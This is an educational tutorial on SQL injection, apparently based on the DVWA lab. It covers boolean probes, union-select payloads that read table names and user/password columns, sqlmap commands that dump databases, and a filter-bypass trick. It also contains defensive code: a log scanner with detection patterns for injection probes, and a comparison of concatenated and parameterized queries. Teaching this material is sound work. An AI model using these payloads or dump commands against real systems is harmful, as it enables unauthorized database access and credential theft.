SQL injection vulnerability
1. Understanding
SQL injection is a security vulnerability that arises at the boundary between the application layer and the database layer. An attacker places SQL commands inside an input string; if the application does not check the characters in that input, the injected commands are run by the database as if they were normal SQL commands.
2. Detailed explanation
Cause analysis: when a user performs an operation such as querying data (for example, searching for a movie title), the input is expected to be an ordinary search term. If the input is instead an SQL fragment, it changes the original SQL statement; if the program does not restrict the input content, this leads to a vulnerability.
Initial attempt:
Generally, one enters SQL keywords so that they are concatenated into the statement, and checks whether the response changes.
Attack method:
1. Detect whether an SQL injection vulnerability exists
Input: query content' and 1=1#
After the original query condition, the appended condition 1=1 is also evaluated, so output is produced only when the whole condition is true.
The # comments out (removes) the rest of the SQL statement that follows the injected input.
Input: query content' and 1=2#
Across the two attempts, 1=1 gives normal output while 1=2 gives no output or an error. This proves that the injected SQL is executed and that an SQL injection vulnerability exists.
2. Exploiting the SQL injection vulnerability
Determining the number of columns/fields: ORDER BY
Input: query content' order by 1#
If the output is normal, the query returns at least one column.
Then enter ' order by 2#, and so on, until the output is no longer normal.
This reveals how many columns the original query returns.
Querying other information with a union: union select [expr1],[expr2]
Input: query content' union select user(),database()#
user(): returns the user of the current database connection
database(): returns the name of the current database
Union query for table names:
Input: query content' union select table_name,table_schema from information_schema.tables where table_schema = 'database name'#
This returns the names of all tables in the named database.
Reading the contents of a chosen table:
Input: query content' union select user,password from users#
This returns the user names and passwords stored in the users table.
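From the defender's side, the probing sequence above (the 1=1/1=2 pair, the order by column count, union select, and reads of information_schema) leaves a recognisable trail in web-server access logs. The following Python script is an added example, not code from the original page: it parses constructed common-log-format lines (the IP addresses, timestamps and the /search.php path are made up for the illustration), URL-decodes each request, and reports which probe step each request matches and which client issued several of them.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=Alien HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=Alien%27+and+1%3D1%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=Alien%27+and+1%3D2%23 HTTP/1.1" 200 300
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=Alien%27+order+by+3%23 HTTP/1.1" 500 120
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=Alien%27+union+select+user%28%29%2Cdatabase%28%29%23 HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=Heat HTTP/1.1" 200 400
"""

# Parser for one log line: client IP, timestamp, method, request path, status code.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Each pattern corresponds to one step of the probing sequence described on the page.
# They are matched against the URL-decoded request so encoded quotes and spaces are seen.
PROBE_PATTERNS = {
    "boolean_probe": re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "column_count_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "schema_read": re.compile(r"\binformation_schema\.", re.I),
}


def classify_request(path):
    """Return the names of all probe patterns found in the decoded request path."""
    decoded = unquote_plus(path)
    return [name for name, pattern in PROBE_PATTERNS.items() if pattern.search(decoded)]


def scan_log(text):
    """Parse each log line and keep those whose request matches at least one probe."""
    findings = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        probes = classify_request(match.group("path"))
        if probes:
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "status": int(match.group("status")),
                "probes": probes,
                "request": unquote_plus(match.group("path")),
            })
    return findings


def suspicious_sources(findings, threshold=2):
    """Client IPs that issued at least `threshold` probe requests.
    The page's 1=1 / 1=2 pair alone already reaches two."""
    counts = Counter(f["ip"] for f in findings)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["probes"], h["request"])
    print("suspicious sources:", suspicious_sources(hits))
```

The status column is worth keeping in the findings: the order by step typically produces a server error once the column count is exceeded, and a 500 immediately following a pair of boolean probes from the same client is a stronger signal than any single pattern match.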
3. SQLmap tool
Obtain the SQLmap tool online from its official website, sqlmap.org.
Use it from a command-line window: cd to the folder containing it, then run python sqlmap.py to execute it.
Detect vulnerabilities:
python sqlmap.py -u "URL" --cookie="F12 -> Network tab -> refresh the page -> copy the cookie from the request"
Get all database names:
python sqlmap.py -u "URL" --cookie="" --dbs
--dbs: enumerate the databases on the server
Get all table names of the specified database:
python sqlmap.py -u "URL" --cookie="" -D database_name --tables
Get the columns of the specified table in the specified database:
python sqlmap.py -u "URL" --cookie="" -D database_name -T table_name --columns
-D: specify the database name to enumerate
-T: specify the table name to enumerate
--columns: list the table's columns
Retrieve data:
python sqlmap.py -u "URL" --cookie="" -D database_name -T table_name --dump
--dump: read (dump) the table's data
4. SQL injection prevention
Filter the user's input and prevent SQL statements from being entered.
Replace special symbols with nothing, or detect that the user has entered an SQL statement and terminate execution.
Add an escape character (a backslash, \) in front of special symbols such as quotes, so that the injected SQL becomes invalid.
Add a limit at the end of the original SQL statement, such as LIMIT 1.
Use SQL preprocessing (prepared statements, e.g. PDO in PHP): with correct filtering and prepared SQL statements, SQL injection can be avoided.
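The following Python program is an added example, not code from the original page. It puts the cause described in section 2 (input concatenated into the SQL text) beside the prepared-statement prevention from section 4, using Python's sqlite3 module in place of PHP/PDO and MySQL; the movies table and its rows are constructed for the illustration. Because SQLite has no # line comment, the page's 1=1 / 1=2 probe is written with SQLite's -- comment instead. build_vulnerable_sql shows how the probe changes the statement, while search_parameterized passes the same input as a bound string value, so it never reaches the SQL parser as code.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the page's movie-search table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO movies (title) VALUES (?)",
                     [("Alien",), ("Aliens",), ("Heat",)])
    return conn


def build_vulnerable_sql(user_input):
    """The cause from section 2: the input is spliced into the SQL text,
    so a quote in the input ends the string and the rest becomes SQL."""
    return "SELECT title FROM movies WHERE title = '" + user_input + "'"


def search_vulnerable(conn, user_input):
    """Runs the concatenated statement (vulnerable; kept only for comparison)."""
    return [row[0] for row in conn.execute(build_vulnerable_sql(user_input))]


def search_parameterized(conn, user_input):
    """The prevention from section 4 (prepared statement / parameter binding):
    the SQL text is fixed and the input is always passed as a string value."""
    sql = "SELECT title FROM movies WHERE title = ?"
    return [row[0] for row in conn.execute(sql, (user_input,))]


def boolean_probe_differs(search, conn, term):
    """The page's 1=1 / 1=2 check, run against a search function.
    '--' stands in for MySQL's '#' because SQLite has no '#' comment.
    True means the two probes produced different results, i.e. the input
    reached the SQL parser as code; a parameterized query returns False."""
    true_probe = term + "' and 1=1 -- "
    false_probe = term + "' and 1=2 -- "
    return search(conn, true_probe) != search(conn, false_probe)


if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_sql("Alien' and 1=1 -- "))
    print("vulnerable:", boolean_probe_differs(search_vulnerable, conn, "Alien"))
    print("parameterized:", boolean_probe_differs(search_parameterized, conn, "Alien"))
```

The parameterized version needs no character filtering at all: the driver sends the statement and the value separately, so the filtering, escaping and LIMIT measures listed above become defence in depth rather than the primary control.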
5. Bypass methods
Avoid entering special characters.
For example, for a database named dvwa,
the literal 'dvwa' can be replaced with database() or with its hex encoding.
Example: query content' union select table_name,table_schema from information_schema.tables where table_schema = 'database name'#
Change to: query content union select table_name,table_schema from information_schema.tables where table_schema = database()#